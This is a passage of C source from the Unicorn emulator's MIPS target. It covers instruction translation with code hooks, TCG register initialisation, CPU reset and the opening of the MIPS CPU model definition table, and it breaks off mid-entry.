static void mips_tr_tb_start(DisasContextBase *dcbase, CPUState *cs)
{
}

static void mips_tr_insn_start(DisasContextBase *dcbase, CPUState *cs)
{
    DisasContext *ctx = container_of(dcbase, DisasContext, base);
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;

    tcg_gen_insn_start(tcg_ctx, ctx->base.pc_next,
                       ctx->hflags & MIPS_HFLAG_BMASK, ctx->btarget);
}

static bool mips_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cs,
                                     const CPUBreakpoint *bp)
{
    DisasContext *ctx = container_of(dcbase, DisasContext, base);
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;

    save_cpu_state(ctx, 1);
    ctx->base.is_jmp = DISAS_NORETURN;
    gen_helper_raise_exception_debug(tcg_ctx, tcg_ctx->cpu_env);
    /*
     * The address covered by the breakpoint must be included in
     * [tb->pc, tb->pc + tb->size) in order for it to be
     * properly cleared -- thus we increment the PC here so that
     * the logic setting tb->size below does the right thing.
     */
    ctx->base.pc_next += 4;
    return true;
}

static void mips_tr_translate_insn(DisasContextBase *dcbase, CPUState *cs)
{
    CPUMIPSState *env = cs->env_ptr;
    DisasContext *ctx = container_of(dcbase, DisasContext, base);
    struct uc_struct *uc = cs->uc;
    TCGContext *tcg_ctx = uc->tcg_ctx;
    TCGOp *tcg_op, *prev_op = NULL;
    int insn_bytes;
    int is_slot;
    bool hook_insn = false;

    is_slot = ctx->hflags & MIPS_HFLAG_BMASK;

    // Unicorn: end address tells us to stop emulation
    if (uc_addr_is_exit(uc, ctx->base.pc_next)) {
        // raise a special interrupt to quit
        gen_helper_wait(tcg_ctx, tcg_ctx->cpu_env);
        ctx->base.is_jmp = DISAS_NORETURN;
        return;
    }

    // Unicorn: trace this instruction on request
    if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_CODE, ctx->base.pc_next)) {
        // Sync PC in advance
        gen_save_pc(tcg_ctx, ctx->base.pc_next);
        // remember the last TCG op emitted so far; the op that
        // gen_uc_tracecode() emits right after it carries the placeholder
        // instruction size that gets patched below
        prev_op = tcg_last_op(tcg_ctx);
        hook_insn = true;
        gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, uc, ctx->base.pc_next);
        // Don't let unicorn stop at the branch delay slot.
        if (!is_slot) {
            // the callback might want to stop emulation immediately
            check_exit_request(tcg_ctx);
        }
    }

    if (ctx->insn_flags & ISA_NANOMIPS32) {
        ctx->opcode = cpu_lduw_code(env, ctx->base.pc_next);
        insn_bytes = decode_nanomips_opc(env, ctx);
    } else if (!(ctx->hflags & MIPS_HFLAG_M16)) {
        ctx->opcode = cpu_ldl_code(env, ctx->base.pc_next);
        insn_bytes = 4;
        decode_opc(env, ctx);
    } else if (ctx->insn_flags & ASE_MICROMIPS) {
        ctx->opcode = cpu_lduw_code(env, ctx->base.pc_next);
        insn_bytes = decode_micromips_opc(env, ctx);
    } else if (ctx->insn_flags & ASE_MIPS16) {
        ctx->opcode = cpu_lduw_code(env, ctx->base.pc_next);
        insn_bytes = decode_mips16_opc(env, ctx);
    } else {
        generate_exception_end(ctx, EXCP_RI);
        g_assert(ctx->base.is_jmp == DISAS_NORETURN);
        return;
    }

    if (hook_insn) {
        // Unicorn: patch the callback to have the proper instruction size.
        if (prev_op) {
            // As explained above where prev_op is assigned, we move forward
            // in the tail queue, so we're modifying the move instruction
            // generated by gen_uc_tracecode() that carries the instruction
            // size, replacing the 0xF1F1F1F1 placeholder with the real size.
            tcg_op = QTAILQ_NEXT(prev_op, link);
        } else {
            // this is the very first instruction ever translated, so the
            // op emitted by gen_uc_tracecode() is the first op in the queue
            tcg_op = QTAILQ_FIRST(&tcg_ctx->ops);
        }
        tcg_op->args[1] = insn_bytes;
    }

    if (ctx->hflags & MIPS_HFLAG_BMASK) {
        if (!(ctx->hflags & (MIPS_HFLAG_BDS16 | MIPS_HFLAG_BDS32 |
                             MIPS_HFLAG_FBNSLOT))) {
            /*
             * Force the branch to be generated, as there is neither a
             * delay slot nor a forbidden slot.
             */
            is_slot = 1;
        }
        if ((ctx->hflags & MIPS_HFLAG_M16) &&
            (ctx->hflags & MIPS_HFLAG_FBNSLOT)) {
            /*
             * Force the branch to be generated, as microMIPS R6 doesn't
             * restrict branches in the forbidden slot.
             */
            is_slot = 1;
        }
    }
    if (is_slot) {
        gen_branch(ctx, insn_bytes);
    }
    ctx->base.pc_next += insn_bytes;

    if (ctx->base.is_jmp != DISAS_NEXT) {
        return;
    }
    /*
     * Execute a branch and its delay slot as a single instruction.
     * This is what GDB expects and is consistent with what the
     * hardware does (e.g. if a delay slot instruction faults, the
     * reported PC is the PC of the branch).
*/ if (ctx->base.singlestep_enabled && (ctx->hflags & MIPS_HFLAG_BMASK) == 0) { ctx->base.is_jmp = DISAS_TOO_MANY; } if (ctx->base.pc_next - ctx->page_start >= TARGET_PAGE_SIZE) { ctx->base.is_jmp = DISAS_TOO_MANY; } } static void mips_tr_tb_stop(DisasContextBase *dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->base.singlestep_enabled && ctx->base.is_jmp != DISAS_NORETURN) { save_cpu_state(ctx, ctx->base.is_jmp != DISAS_EXIT); gen_helper_raise_exception_debug(tcg_ctx, tcg_ctx->cpu_env); } else { switch (ctx->base.is_jmp) { case DISAS_STOP: gen_save_pc(tcg_ctx, ctx->base.pc_next); tcg_gen_lookup_and_goto_ptr(tcg_ctx); break; case DISAS_NEXT: case DISAS_TOO_MANY: save_cpu_state(ctx, 0); gen_goto_tb(ctx, 0, ctx->base.pc_next); break; case DISAS_EXIT: tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; case DISAS_NORETURN: break; default: g_assert_not_reached(); } } } static const TranslatorOps mips_tr_ops = { .init_disas_context = mips_tr_init_disas_context, .tb_start = mips_tr_tb_start, .insn_start = mips_tr_insn_start, .breakpoint_check = mips_tr_breakpoint_check, .translate_insn = mips_tr_translate_insn, .tb_stop = mips_tr_tb_stop, }; void gen_intermediate_code(CPUState *cs, TranslationBlock *tb, int max_insns) { DisasContext ctx; memset(&ctx, 0, sizeof(ctx)); translator_loop(&mips_tr_ops, &ctx.base, cs, tb, max_insns); } void mips_tcg_init(struct uc_struct *uc) { int i; TCGContext *tcg_ctx = uc->tcg_ctx; tcg_ctx->cpu_gpr[0] = NULL; for (i = 1; i < 32; i++) tcg_ctx->cpu_gpr[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.gpr[i]), regnames[i]); for (i = 0; i < 32; i++) { int off = offsetof(CPUMIPSState, active_fpu.fpr[i].wr.d[0]); tcg_ctx->msa_wr_d[i * 2] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, off, msaregnames[i * 2]); /* * The scalar floating-point unit (FPU) registers are mapped on * the MSA vector registers. 
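* Concretely, fpu_f64[i] aliases wr.d[0], the low 64 bits of MSA register
* w[i], so scalar FPU writes are immediately visible to MSA reads and
* vice versa.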
*/ tcg_ctx->fpu_f64[i] = tcg_ctx->msa_wr_d[i * 2]; off = offsetof(CPUMIPSState, active_fpu.fpr[i].wr.d[1]); tcg_ctx->msa_wr_d[i * 2 + 1] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, off, msaregnames[i * 2 + 1]); } tcg_ctx->cpu_pc = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.PC), "PC"); for (i = 0; i < MIPS_DSP_ACC; i++) { tcg_ctx->cpu_HI[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.HI[i]), regnames_HI[i]); tcg_ctx->cpu_LO[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.LO[i]), regnames_LO[i]); } tcg_ctx->cpu_dspctrl = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.DSPControl), "DSPControl"); tcg_ctx->bcond = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, bcond), "bcond"); tcg_ctx->btarget = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, btarget), "btarget"); tcg_ctx->hflags = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, hflags), "hflags"); tcg_ctx->fpu_fcr0 = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_fpu.fcr0), "fcr0"); tcg_ctx->fpu_fcr31 = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_fpu.fcr31), "fcr31"); tcg_ctx->cpu_lladdr = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, lladdr), "lladdr"); tcg_ctx->cpu_llval = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, llval), "llval"); #if defined(TARGET_MIPS64) tcg_ctx->cpu_mmr[0] = NULL; for (i = 1; i < 32; i++) { tcg_ctx->cpu_mmr[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.mmr[i]), regnames[i]); } #endif #if !defined(TARGET_MIPS64) for (i = 0; i < NUMBER_OF_MXU_REGISTERS - 1; i++) { tcg_ctx->mxu_gpr[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.mxu_gpr[i]), mxuregnames[i]); } tcg_ctx->mxu_CR = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.mxu_cr), mxuregnames[NUMBER_OF_MXU_REGISTERS - 1]); #endif } #include "translate_init.inc.c" void cpu_mips_realize_env(CPUMIPSState *env) { env->exception_base = (int32_t)0xBFC00000; mmu_init(env, env->cpu_model); fpu_init(env, env->cpu_model); mvp_init(env, env->cpu_model); } #if 0 bool cpu_supports_cps_smp(const char *cpu_type) { const MIPSCPUClass *mcc = MIPS_CPU_CLASS(object_class_by_name(cpu_type)); return (mcc->cpu_def->CP0_Config3 & (1 << CP0C3_CMGCR)) != 0; } bool cpu_supports_isa(const char *cpu_type, uint64_t isa) { const MIPSCPUClass *mcc = MIPS_CPU_CLASS(object_class_by_name(cpu_type)); return (mcc->cpu_def->insn_flags & isa) != 0; } void cpu_set_exception_base(int vp_index, target_ulong address) { MIPSCPU *vp = MIPS_CPU(qemu_get_cpu(vp_index)); vp->env.exception_base = address; } #endif void cpu_state_reset(CPUMIPSState *env) { CPUState *cs = env_cpu(env); /* Reset registers to their default values */ env->CP0_PRid = env->cpu_model->CP0_PRid; env->CP0_Config0 = env->cpu_model->CP0_Config0; #ifdef TARGET_WORDS_BIGENDIAN env->CP0_Config0 |= (1 << CP0C0_BE); #endif env->CP0_Config1 = env->cpu_model->CP0_Config1; env->CP0_Config2 = env->cpu_model->CP0_Config2; env->CP0_Config3 = env->cpu_model->CP0_Config3; env->CP0_Config4 = env->cpu_model->CP0_Config4; env->CP0_Config4_rw_bitmask = env->cpu_model->CP0_Config4_rw_bitmask; env->CP0_Config5 = env->cpu_model->CP0_Config5; env->CP0_Config5_rw_bitmask = env->cpu_model->CP0_Config5_rw_bitmask; env->CP0_Config6 
= env->cpu_model->CP0_Config6; env->CP0_Config7 = env->cpu_model->CP0_Config7; env->CP0_LLAddr_rw_bitmask = env->cpu_model->CP0_LLAddr_rw_bitmask << env->cpu_model->CP0_LLAddr_shift; env->CP0_LLAddr_shift = env->cpu_model->CP0_LLAddr_shift; env->SYNCI_Step = env->cpu_model->SYNCI_Step; env->CCRes = env->cpu_model->CCRes; env->CP0_Status_rw_bitmask = env->cpu_model->CP0_Status_rw_bitmask; env->CP0_TCStatus_rw_bitmask = env->cpu_model->CP0_TCStatus_rw_bitmask; env->CP0_SRSCtl = env->cpu_model->CP0_SRSCtl; env->current_tc = 0; env->SEGBITS = env->cpu_model->SEGBITS; env->SEGMask = (target_ulong)((1ULL << env->cpu_model->SEGBITS) - 1); #if defined(TARGET_MIPS64) if (env->cpu_model->insn_flags & ISA_MIPS3) { env->SEGMask |= 3ULL << 62; } #endif env->PABITS = env->cpu_model->PABITS; env->CP0_SRSConf0_rw_bitmask = env->cpu_model->CP0_SRSConf0_rw_bitmask; env->CP0_SRSConf0 = env->cpu_model->CP0_SRSConf0; env->CP0_SRSConf1_rw_bitmask = env->cpu_model->CP0_SRSConf1_rw_bitmask; env->CP0_SRSConf1 = env->cpu_model->CP0_SRSConf1; env->CP0_SRSConf2_rw_bitmask = env->cpu_model->CP0_SRSConf2_rw_bitmask; env->CP0_SRSConf2 = env->cpu_model->CP0_SRSConf2; env->CP0_SRSConf3_rw_bitmask = env->cpu_model->CP0_SRSConf3_rw_bitmask; env->CP0_SRSConf3 = env->cpu_model->CP0_SRSConf3; env->CP0_SRSConf4_rw_bitmask = env->cpu_model->CP0_SRSConf4_rw_bitmask; env->CP0_SRSConf4 = env->cpu_model->CP0_SRSConf4; env->CP0_PageGrain_rw_bitmask = env->cpu_model->CP0_PageGrain_rw_bitmask; env->CP0_PageGrain = env->cpu_model->CP0_PageGrain; env->CP0_EBaseWG_rw_bitmask = env->cpu_model->CP0_EBaseWG_rw_bitmask; env->active_fpu.fcr0 = env->cpu_model->CP1_fcr0; env->active_fpu.fcr31_rw_bitmask = env->cpu_model->CP1_fcr31_rw_bitmask; env->active_fpu.fcr31 = env->cpu_model->CP1_fcr31; env->msair = env->cpu_model->MSAIR; env->insn_flags = env->cpu_model->insn_flags; if (env->hflags & MIPS_HFLAG_BMASK) { /* * If the exception was raised from a delay slot, * come back to the jump. */ env->CP0_ErrorEPC = (env->active_tc.PC - (env->hflags & MIPS_HFLAG_B16 ? 2 : 4)); } else { env->CP0_ErrorEPC = env->active_tc.PC; } env->active_tc.PC = env->exception_base; env->CP0_Random = env->tlb->nb_tlb - 1; env->tlb->tlb_in_use = env->tlb->nb_tlb; env->CP0_Wired = 0; env->CP0_GlobalNumber = (cs->cpu_index & 0xFF) << CP0GN_VPId; env->CP0_EBase = (cs->cpu_index & 0x3FF); // if (mips_um_ksegs_enabled()) { if (false) { env->CP0_EBase |= 0x40000000; } else { env->CP0_EBase |= (int32_t)0x80000000; } if (env->CP0_Config3 & (1 << CP0C3_CMGCR)) { env->CP0_CMGCRBase = 0x1fbf8000 >> 4; } env->CP0_EntryHi_ASID_mask = (env->CP0_Config5 & (1 << CP0C5_MI)) ? 0x0 : (env->CP0_Config4 & (1 << CP0C4_AE)) ? 0x3ff : 0xff; env->CP0_Status = (1 << CP0St_BEV) | (1 << CP0St_ERL); /* * Vectored interrupts not implemented, timer on int 7, * no performance counters. */ env->CP0_IntCtl = 0xe0000000; { int i; for (i = 0; i < 7; i++) { env->CP0_WatchLo[i] = 0; env->CP0_WatchHi[i] = 0x80000000; } env->CP0_WatchLo[7] = 0; env->CP0_WatchHi[7] = 0; } /* Count register increments in debug mode, EJTAG version 1 */ env->CP0_Debug = (1 << CP0DB_CNT) | (0x1 << CP0DB_VER); // cpu_mips_store_count(env, 1); if (env->CP0_Config3 & (1 << CP0C3_MT)) { int i; /* Only TC0 on VPE 0 starts as active. */ for (i = 0; i < ARRAY_SIZE(env->tcs); i++) { env->tcs[i].CP0_TCBind = cs->cpu_index << CP0TCBd_CurVPE; env->tcs[i].CP0_TCHalt = 1; } env->active_tc.CP0_TCHalt = 1; cs->halted = 1; if (cs->cpu_index == 0) { /* VPE0 starts up enabled. 
 */
            env->mvp->CP0_MVPControl |= (1 << CP0MVPCo_EVP);
            env->CP0_VPEConf0 |= (1 << CP0VPEC0_MVP) | (1 << CP0VPEC0_VPA);
            /* TC0 starts up unhalted. */
            cs->halted = 0;
            env->active_tc.CP0_TCHalt = 0;
            env->tcs[0].CP0_TCHalt = 0;
            /* With thread 0 active. */
            env->active_tc.CP0_TCStatus = (1 << CP0TCSt_A);
            env->tcs[0].CP0_TCStatus = (1 << CP0TCSt_A);
        }
    }
    if (env->CP0_Config1 & (1 << CP0C1_FP)) {
        env->CP0_Status |= (1 << CP0St_CU1);
    }
    /*
     * Configure default legacy segmentation control. We use this regardless
     * of whether segmentation control is presented to the guest.
     */
    /* KSeg3 (seg0 0xE0000000..0xFFFFFFFF) */
    env->CP0_SegCtl0 = (CP0SC_AM_MK << CP0SC_AM);
    /* KSeg2 (seg1 0xC0000000..0xDFFFFFFF) */
    env->CP0_SegCtl0 |= ((CP0SC_AM_MSK << CP0SC_AM)) << 16;
    /* KSeg1 (seg2 0xA0000000..0xBFFFFFFF) */
    env->CP0_SegCtl1 = (0 << CP0SC_PA) | (CP0SC_AM_UK << CP0SC_AM) |
                       (2 << CP0SC_C);
    /* KSeg0 (seg3 0x80000000..0x9FFFFFFF) */
    env->CP0_SegCtl1 |= ((0 << CP0SC_PA) | (CP0SC_AM_UK << CP0SC_AM) |
                         (3 << CP0SC_C)) << 16;
    /* USeg (seg4 0x40000000..0x7FFFFFFF) */
    env->CP0_SegCtl2 = (2 << CP0SC_PA) | (CP0SC_AM_MUSK << CP0SC_AM) |
                       (1 << CP0SC_EU) | (2 << CP0SC_C);
    /* USeg (seg5 0x00000000..0x3FFFFFFF) */
    env->CP0_SegCtl2 |= ((0 << CP0SC_PA) | (CP0SC_AM_MUSK << CP0SC_AM) |
                         (1 << CP0SC_EU) | (2 << CP0SC_C)) << 16;
    /* XKPhys (note, SegCtl2.XR = 0, so XAM won't be used) */
    env->CP0_SegCtl1 |= (CP0SC_AM_UK << CP0SC1_XAM);
    if ((env->insn_flags & ISA_MIPS32R6) &&
        (env->active_fpu.fcr0 & (1 << FCR0_F64))) {
        /* Status.FR = 0 mode in 64-bit FPU not allowed in R6 */
        env->CP0_Status |= (1 << CP0St_FR);
    }
    if (env->insn_flags & ISA_MIPS32R6) {
        /* PTW = 1 */
        env->CP0_PWSize = 0x40;
        /* GDI = 12, UDI = 12, MDI = 12, PRI = 12, PTEI = 2 */
        env->CP0_PWField = 0x0C30C302;
    } else {
        /* GDI = 0, UDI = 0, MDI = 0, PRI = 0, PTEI = 2 */
        env->CP0_PWField = 0x02;
    }
    if (env->CP0_Config3 & (1 << CP0C3_ISA) & (1 << (CP0C3_ISA + 1))) {
        /* microMIPS on reset when Config3.ISA is 3 */
        env->hflags |= MIPS_HFLAG_M16;
    }
    /* MSA */
    if (env->CP0_Config3 & (1 << CP0C3_MSAP)) {
        msa_reset(env);
    }
    compute_hflags(env);
    restore_fp_status(env);
    restore_pamask(env);
    cs->exception_index = EXCP_NONE;
#if 0
    if (semihosting_get_argc()) {
        /* UHI interface can be used to obtain argc and argv */
        env->active_tc.gpr[4] = -1;
    }
#endif
}

void restore_state_to_opc(CPUMIPSState *env, TranslationBlock *tb,
                          target_ulong *data)
{
    env->active_tc.PC = data[0];
    env->hflags &= ~MIPS_HFLAG_BMASK;
    env->hflags |= data[1];
    switch (env->hflags & MIPS_HFLAG_BMASK_BASE) {
    case MIPS_HFLAG_BR:
        break;
    case MIPS_HFLAG_BC:
    case MIPS_HFLAG_BL:
    case MIPS_HFLAG_B:
        env->btarget = data[2];
        break;
    }
}

/* ==== unicorn-2.1.1/qemu/target/mips/translate_init.inc.c ==== */

/*
 * MIPS emulation for qemu: CPU initialisation routines.
* * Copyright (c) 2004-2005 Jocelyn Mayer * Copyright (c) 2007 Herve Poussineau * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* CPU / CPU family specific config register values. */ /* Have config1, uncached coherency */ #define MIPS_CONFIG0 \ ((1U << CP0C0_M) | (0x2 << CP0C0_K0)) /* Have config2, no coprocessor2 attached, no MDMX support attached, no performance counters, watch registers present, no code compression, EJTAG present, no FPU */ #define MIPS_CONFIG1 \ ((1U << CP0C1_M) | \ (0 << CP0C1_C2) | (0 << CP0C1_MD) | (0 << CP0C1_PC) | \ (1 << CP0C1_WR) | (0 << CP0C1_CA) | (1 << CP0C1_EP) | \ (0 << CP0C1_FP)) /* Have config3, no tertiary/secondary caches implemented */ #define MIPS_CONFIG2 \ ((1U << CP0C2_M)) /* No config4, no DSP ASE, no large physaddr (PABITS), no external interrupt controller, no vectored interrupts, no 1kb pages, no SmartMIPS ASE, no trace logic */ #define MIPS_CONFIG3 \ ((0 << CP0C3_M) | (0 << CP0C3_DSPP) | (0 << CP0C3_LPA) | \ (0 << CP0C3_VEIC) | (0 << CP0C3_VInt) | (0 << CP0C3_SP) | \ (0 << CP0C3_SM) | (0 << CP0C3_TL)) #define MIPS_CONFIG4 \ ((0 << CP0C4_M)) #define MIPS_CONFIG5 \ ((0 << CP0C5_M)) /*****************************************************************************/ /* MIPS CPU definitions */ const mips_def_t mips_defs[] = { { .name = "4Kc", .CP0_PRid = 0x00018000, .CP0_Config0 = MIPS_CONFIG0 | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (0 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1278FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32, .mmu_type = MMU_TYPE_R4000, }, { .name = "4Km", .CP0_PRid = 0x00018300, /* Config1 implemented, fixed mapping MMU, no virtual icache, uncached coherency. 
*/ .CP0_Config0 = MIPS_CONFIG0 | (MMU_TYPE_FMT << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1258FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32 | ASE_MIPS16, .mmu_type = MMU_TYPE_FMT, }, { .name = "4KEcR1", .CP0_PRid = 0x00018400, .CP0_Config0 = MIPS_CONFIG0 | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (0 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1278FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32, .mmu_type = MMU_TYPE_R4000, }, { .name = "4KEmR1", .CP0_PRid = 0x00018500, .CP0_Config0 = MIPS_CONFIG0 | (MMU_TYPE_FMT << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1258FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32 | ASE_MIPS16, .mmu_type = MMU_TYPE_FMT, }, { .name = "4KEc", .CP0_PRid = 0x00019000, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (0 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (0 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1278FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2, .mmu_type = MMU_TYPE_R4000, }, { .name = "4KEm", .CP0_PRid = 0x00019100, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_FMT << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1258FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MIPS16, .mmu_type = MMU_TYPE_FMT, }, { .name = "24Kc", .CP0_PRid = 0x00019300, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (0 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, /* No DSP implemented. 
*/ .CP0_Status_rw_bitmask = 0x1278FF1F, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MIPS16, .mmu_type = MMU_TYPE_R4000, }, { .name = "24KEc", .CP0_PRid = 0x00019600, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1 << CP0C3_DSPP) | (0 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, /* we have a DSP, but no FPU */ .CP0_Status_rw_bitmask = 0x1378FF1F, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MIPS16 | ASE_DSP, .mmu_type = MMU_TYPE_R4000, }, { .name = "24Kf", .CP0_PRid = 0x00019300, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (0 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, /* No DSP implemented. */ .CP0_Status_rw_bitmask = 0x3678FF1F, .CP1_fcr0 = (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x93 << FCR0_PRID), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MIPS16, .mmu_type = MMU_TYPE_R4000, }, { .name = "34Kf", .CP0_PRid = 0x00019500, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 